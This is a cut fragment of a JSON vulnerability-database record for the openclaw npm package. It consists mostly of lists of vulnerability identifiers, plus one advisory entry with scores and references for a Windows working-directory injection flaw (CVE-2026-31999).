-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-7xmq-g46g-f8pv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-93ka-ajkk-3keu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50507?format=json","vulnerability_id":"VCID-9nq6-ujfu-4ycx","summary":"CpenClaw's ACPX Windows wrapper shell fallback allowed cwd injection in specific paths\nOn Windows ACPX paths, wrapper resolution for `.cmd`/`.bat` could fall back to shell execution in ways that allowed `cwd` influence to alter execution behavior.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31999","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25976","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25983","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31999"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-23T16:45:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999","reference_id":"CVE-2026-31999","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999"},{"reference_url":"https://github.com/advisories/GHSA-6f6j-wx9w-ff4j","reference_id":"GHSA-6f6j-wx9w-ff4j","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6f6j-wx9w-ff4j"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j","reference_id":"GHSA-6f6j-wx9w-ff4j","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-23T16:45:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yu